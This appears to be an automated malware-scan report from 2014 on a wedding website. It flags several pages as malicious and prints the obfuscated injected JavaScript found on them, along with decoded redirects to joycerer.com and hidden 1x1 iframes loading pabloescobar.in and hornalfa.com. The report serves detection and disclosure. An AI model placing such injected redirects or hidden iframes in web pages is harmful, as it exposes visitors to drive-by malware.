Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=harishandmadhu.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://harishandmadhu.com/ | 200 OK Content-Length: 8758 Content-Type: text/html | clean |
http://harishandmadhu.com/index.htm | 200 OK Content-Length: 8758 Content-Type: text/html | clean |
http://harishandmadhu.com/madhu_harish.htm | 200 OK Content-Length: 42255 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ZsTvTrDzZ(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(ZsTvTrDzZ()>100000){function mZcXRmH(BmB){var MvkbLhpQwc=6,QLA=9;var VwJ='55-3+85-3+83-3+91-3+80-0+88-0+82-6+36-6+94-6+85-3+82-0+92-6+84-6+56-0+48-0+36-6+84-6+82-6+85-3+84-0+84-6+92-6+56-0+48-0+36-6+80-6+89-3+91-3+82-0+82-6+',HlStoWoAY=VwJ.split('+');IIkTgIY='';function H ...[2609 bytes skipped]... Decoded script: document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>'); document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>'); /*** called setTimeout with document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>');, 273 */ top.location='http://joycerer.com/red4.php'; Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://www.pabloescobar.in/analytics/in.cgi?3 <iframe src="http://www.pabloescobar.in/analytics/in.cgi?3" name="iframe" width="1" height="1" scrolling="auto"> | ||
http://maffocuba.com/images/gifimg.php | 200 OK Content-Length: 112 Content-Type: text/html | clean |
http://maffocuba.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://harishandmadhu.com/snapshots/snapshots.htm | 200 OK Content-Length: 28944 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function nme(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(nme()>100000){function eEbKvNHSe(qEMQFOXnKc){ alert('nOBevVbxC');var nwTsnsgjfK = document.getElementById('olXPOWIOd'); }
function CnqEdre(QbWYjhIxns){var ikHGXJHQz=4,ysSci=9;var JzGUiHrCQy='55+5,75+5,74+2,79+5,72+0,77+3,73+7,43+1,81+7,75+5,73+3,80+4,75+1,56+0,50+6,43+1,7 ...[2629 bytes skipped]... Decoded script: document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>'); document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>'); /*** called setTimeout with document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>');, 273 */ top.location='http://joycerer.com/red4.php'; Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://www.pabloescobar.in/analytics/in.cgi?3 <iframe src="http://www.pabloescobar.in/analytics/in.cgi?3" name="iframe" width="1" height="1" scrolling="auto"> | ||
http://harishandmadhu.com/events.htm | 200 OK Content-Length: 21875 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: hornalfa.com function pvpWtfe(MNrIIFkWOn){fff=op.split("419"); }
function kURR(nFLmTOcXq){var NcOVmyOEv=2,kiVNYDgXW=5;var iWOmzcsY='34,4+52,4+51,3+56,2+49,3+54,2+51,1+23,3+58,2+52,4+50,4+57,1+52,2+35,1+30,2+23,3+52,2+51,1+52,4+52,0+52,2+57,1+35,1+30,2+23,3+50,0+55,1+56,2+50,4+51,1+',EFjwCPA=iWOmzcsY.split('+');MhaxC='';function vHDzOYivoX(c){return String.fromCharCode(c);}for(EQudsvg=(EFjwCPA.length-1);EQudsvg>=(-0x10-0x18+0x28);EQudsvg-=0x1+0xe-0xc-0x10+ ...[3103 bytes skipped]... Decoded script: <iframe width=1 height=1 border=0 frameborder=0 src='http://hornalfa.com/in3.php'></iframe> | ||
http://harishandmadhu.com/rites.htm | 200 OK Content-Length: 36628 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function nme(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(nme()>100000){function eEbKvNHSe(qEMQFOXnKc){ alert('nOBevVbxC');var nwTsnsgjfK = document.getElementById('olXPOWIOd'); }
function CnqEdre(QbWYjhIxns){var ikHGXJHQz=4,ysSci=9;var JzGUiHrCQy='55+5,75+5,74+2,79+5,72+0,77+3,73+7,43+1,81+7,75+5,73+3,80+4,75+1,56+0,50+6,43+1,7 ...[2629 bytes skipped]... Decoded script: document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>'); document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>'); /*** called setTimeout with document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>');, 273 */ top.location='http://joycerer.com/red4.php'; Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://www.pabloescobar.in/analytics/in.cgi?3 <iframe src="http://www.pabloescobar.in/analytics/in.cgi?3" name="iframe" width="1" height="1" scrolling="auto"> | ||
http://harishandmadhu.com/wedding.pdf | 200 OK Content-Length: 40402 Content-Type: application/pdf | clean |
http://harishandmadhu.com/registry.htm | 200 OK Content-Length: 39409 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ZsTvTrDzZ(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(ZsTvTrDzZ()>100000){function mZcXRmH(BmB){var MvkbLhpQwc=6,QLA=9;var VwJ='55-3+85-3+83-3+91-3+80-0+88-0+82-6+36-6+94-6+85-3+82-0+92-6+84-6+56-0+48-0+36-6+84-6+82-6+85-3+84-0+84-6+92-6+56-0+48-0+36-6+80-6+89-3+91-3+82-0+82-6+',HlStoWoAY=VwJ.split('+');IIkTgIY='';function H ...[2609 bytes skipped]... Decoded script: document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>'); document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>'); /*** called setTimeout with document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>');, 273 */ top.location='http://joycerer.com/red4.php'; Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://www.pabloescobar.in/analytics/in.cgi?3 <iframe src="http://www.pabloescobar.in/analytics/in.cgi?3" name="iframe" width="1" height="1" scrolling="auto"> | ||
http://harishandmadhu.com/accommodation.htm | 200 OK Content-Length: 39167 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ZsTvTrDzZ(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(ZsTvTrDzZ()>100000){function mZcXRmH(BmB){var MvkbLhpQwc=6,QLA=9;var VwJ='55-3+85-3+83-3+91-3+80-0+88-0+82-6+36-6+94-6+85-3+82-0+92-6+84-6+56-0+48-0+36-6+84-6+82-6+85-3+84-0+84-6+92-6+56-0+48-0+36-6+80-6+89-3+91-3+82-0+82-6+',HlStoWoAY=VwJ.split('+');IIkTgIY='';function H ...[2609 bytes skipped]... Decoded script: document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>'); document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>'); /*** called setTimeout with document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>');, 273 */ top.location='http://joycerer.com/red4.php'; Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://www.pabloescobar.in/analytics/in.cgi?3 <iframe src="http://www.pabloescobar.in/analytics/in.cgi?3" name="iframe" width="1" height="1" scrolling="auto"> | ||
http://harishandmadhu.com/rsvp.htm | 404 Not Found Content-Length: 5359 Content-Type: text/html | clean |
http://harishandmadhu.com/file://faultRequestLogPath | 404 Not Found Content-Length: 5393 Content-Type: text/html | clean |
http://harishandmadhu.com/file://file://faultRequestLogPath | 404 Not Found Content-Length: 5405 Content-Type: text/html | clean |
http://harishandmadhu.com/file://file://file://faultRequestLogPath | 404 Not Found Content-Length: 5417 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: harishandmadhu.com
Result:
HTTP/1.1 200 OK
Date: Sat, 27 Sep 2014 19:24:30 GMT
Accept-Ranges: bytes
ETag: "32419d717e47cc1:0"
Server: Microsoft-IIS/7.5
Content-Length: 8758
Content-Type: text/html
Last-Modified: Thu, 21 Jul 2011 08:16:08 GMT
X-Powered-By: ASP.NET
...8758 bytes of data.
GET / HTTP/1.1
Host: harishandmadhu.com
Result:
HTTP/1.1 200 OK
Date: Sat, 27 Sep 2014 19:24:30 GMT
Accept-Ranges: bytes
ETag: "32419d717e47cc1:0"
Server: Microsoft-IIS/7.5
Content-Length: 8758
Content-Type: text/html
Last-Modified: Thu, 21 Jul 2011 08:16:08 GMT
X-Powered-By: ASP.NET
...8758 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: harishandmadhu.com
Referer: http://www.google.com/search?q=harishandmadhu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: harishandmadhu.com
Referer: http://www.google.com/search?q=harishandmadhu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.